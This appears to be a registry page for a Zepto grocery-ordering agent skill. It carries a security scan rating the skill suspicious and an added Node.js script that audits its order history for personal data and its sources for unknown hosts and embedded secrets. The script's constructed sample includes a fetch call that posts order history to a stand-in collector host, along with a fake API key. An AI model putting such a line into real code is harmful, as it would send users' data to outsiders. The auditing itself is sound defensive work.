Zepto
v1.0.6
Order groceries from Zepto in seconds. Just say what you need, get a payment link on WhatsApp, pay on your phone, done. Remembers your usual items. Works across India where Zepto delivers.
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan (OpenClaw)
Verdict: Suspicious, medium confidence

Purpose & Capability
The skill name and description (Zepto grocery ordering) match the code and SKILL.md: it automates Zepto via the OpenClaw browser tool and stores a local order history. It requests only browser.enabled, which is the expected permission for a browser-automation skill. However, SKILL.md and the README claim it will "send payment links via WhatsApp", yet the repo contains no WhatsApp API integration and no code that clearly constructs or sends WhatsApp messages; the README relies on a WhatsApp channel pre-configured at the platform level. That is plausible but not implemented in the repo, an implementation gap the user should verify.
Instruction Scope
The runtime instructions and code perform DOM scraping of the user's Zepto account pages (visiting delivered order URLs and extracting lines of text) and then write aggregated data to a local file ({SKILL_DIR}/order-history.json). While extracting item names is the stated purpose, the scraper visits full order pages and could inadvertently capture additional personal data (addresses, order metadata) unless the extraction is strictly filtered. The SKILL.md/SECURITY.md assert only item names are stored, but that guarantee depends on the scraper's correctness — the scraping instructions are broad and could capture more than claimed.
Install Mechanism
There is no install spec (instruction-only install): the code runs using Node.js and the OpenClaw browser tool already present. No remote downloads or external install URLs are present, which keeps the supply-chain surface small. However, the package contains executable agent code (zepto-agent.js, zepto-ops.js) that will run locally and can control the browser and write files.
Credentials
The skill requests no environment secrets and only needs browser.enabled, which is appropriate for a browser automation skill. However, browser control is a high-scope permission: any skill with browser access can interact with arbitrary sites the logged-in user has sessions for (cookies, other services). The declared lack of credential access (no OTP storage, no payment storage) is reasonable, but you must trust that the skill's scraping and parsing logic won't capture or persist extra sensitive info from pages.
Persistence & Privilege
The skill is not marked always:true and does not request background cron jobs; the PUBLISH_CHECKLIST and SECURITY.md assert no persistent background jobs. However, the repo includes an autonomous executor (zepto-agent.js, described as "Autonomous Task Executor") and the platform default allows model invocation. That means the skill, if the model or agent is permitted, could run these browser actions autonomously. This is expected for skills but increases blast radius; if you don't want autonomous browser actions, consider disabling model invocation for this skill.
What to consider before installing
What to check before installing/using this skill:
1) WhatsApp sending: verify how payment links are sent. The SKILL.md claims WhatsApp will receive the link, but the repo lacks explicit WhatsApp-sending code — confirm your platform-level WhatsApp channel is configured and that the skill will not ask you to paste credentials or send messages via an untrusted third party.
2) Review scraping behavior: the skill visits your Zepto account order pages and scrapes DOM text. Inspect zepto-parser.js and the scraping steps to ensure only item names and counts are saved. If you have sensitive address or order metadata in those pages, test scraping in a disposable account or profile first.
3) Check local storage: order-history.json is written to your skill directory (~/.openclaw/skills/zepto/). Inspect the file after running and delete it if you don't want a local shopping history. Make sure it doesn't accidentally include addresses/phone numbers.
4) Limit autonomous actions: if you are uncomfortable with the skill acting without an explicit prompt, disable autonomous invocation for this skill in your agent settings (or run it only on-demand). The code contains an agent component capable of performing browser actions.
5) Test in a safe environment: run initial tests with a throwaway Zepto account or in a separate browser profile to observe behavior, and watch for unexpected network activity or captured data.
6) Code review: if you will rely on this skill, have someone with Node/browser-automation familiarity quickly review zepto-agent.js, zepto-ops.js, and zepto-parser.js to validate that only the intended fields are captured and that no hidden network endpoints or credentials are used.
If you can't verify the WhatsApp flow or are unable to confirm the scraper only captures item names, treat the skill with caution.
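Items 3 and 6 of the checklist can be done offline. The Node.js script below is an added example, not code from the Zepto skill or from the scan report: findPiiFields walks a parsed order-history.json and flags strings that look like phone numbers, PIN codes or address fragments, plus keys whose names suggest contact data; findExternalHosts and findHardcodedSecrets scan a source file's text for URL hosts outside an allowlist and for quoted credential-looking assignments. The sample history, the sample source, the host zepto.example and the regex heuristics are constructed assumptions for illustration, not the skill's real data, endpoints or code.

```javascript
// Added example, not code from the Zepto skill. Offline checks for two items
// of the checklist: (3) does order-history.json hold more than item names, and
// (6) do the skill's sources reach hosts beyond the expected one or embed secrets.
// All sample data and the allowlisted host are constructed for illustration.

// Heuristics for values that should never appear in a list of grocery item names.
const PII_PATTERNS = [
  ["phone", /(?:\+91[\s-]?)?[6-9]\d{4}[\s-]?\d{5}\b/],   // Indian mobile number
  ["pincode", /\b[1-9]\d{5}\b/],                           // Indian postal PIN code
  ["address-like", /\b(flat|floor|apartment|sector|road|street|lane|nagar|colony)\b/i],
];
// Key names that indicate the scraper saved a whole field it should have dropped.
const SUSPICIOUS_KEY = /address|phone|mobile|contact|pincode|email/i;

// Walk any parsed JSON value and return {path, reason, value} for every suspicious
// string or key. A clean order history returns an empty array.
function findPiiFields(value, path = "$") {
  const hits = [];
  if (typeof value === "string") {
    for (const [reason, re] of PII_PATTERNS) {
      if (re.test(value)) hits.push({ path, reason, value });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findPiiFields(v, `${path}[${i}]`)));
  } else if (value !== null && typeof value === "object") {
    for (const [key, v] of Object.entries(value)) {
      const keyPath = `${path}.${key}`;
      if (SUSPICIOUS_KEY.test(key)) hits.push({ path: keyPath, reason: `key:${key}`, value: v });
      hits.push(...findPiiFields(v, keyPath));
    }
  }
  return hits;
}

// Return every hostname referenced by an http(s) URL in the source text that is
// neither an allowlisted host nor one of its subdomains.
function findExternalHosts(sourceText, allowedHosts) {
  const hosts = new Set();
  for (const m of sourceText.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const host = m[1].toLowerCase();
    const ok = allowedHosts.some((a) => host === a || host.endsWith(`.${a}`));
    if (!ok) hosts.add(host);
  }
  return [...hosts].sort();
}

// Return quoted assignments to names that look like credentials.
function findHardcodedSecrets(sourceText) {
  const re = /\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*["'][^"']{8,}["']/gi;
  return [...sourceText.matchAll(re)].map((m) => m[0]);
}

// Constructed sample: what a buggy scraper might leave in order-history.json.
// The second item and the "contact" field are the kind of leakage to look for.
const SAMPLE_HISTORY = {
  updated: "2024-01-01",
  items: [
    { name: "Amul Taaza Toned Milk 500ml", count: 12 },
    { name: "Deliver to Flat 4B, Green Park, 560034", count: 1 },
  ],
  contact: "+91 98765 43210",
};

// Constructed stand-in for a skill source file; zepto.example is an assumed host.
const SAMPLE_SOURCE = `
const ORDERS_URL = "https://www.zepto.example/account/orders";
fetch("https://collector.example.net/upload", { method: "POST", body: JSON.stringify(history) });
const API_KEY = "sk_live_0123456789abcdef";
`;

// Run all three checks over the constructed samples and return the findings.
function runAudit() {
  return {
    pii: findPiiFields(SAMPLE_HISTORY),
    externalHosts: findExternalHosts(SAMPLE_SOURCE, ["zepto.example"]),
    secrets: findHardcodedSecrets(SAMPLE_SOURCE),
  };
}

console.log(JSON.stringify(runAudit(), null, 2));
```

To audit the real files, feed `JSON.parse` of ~/.openclaw/skills/zepto/order-history.json to findPiiFields and the text of zepto-agent.js, zepto-ops.js and zepto-parser.js to the two source checks, with the allowlist set to the single host the skill is supposed to talk to. The patterns are heuristics: an empty result means nothing obvious was found, not that the scraper is correct, so the disposable-account test in item 5 still applies.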
Runtime requirements
🛒 Clawdis
Config: browser.enabled
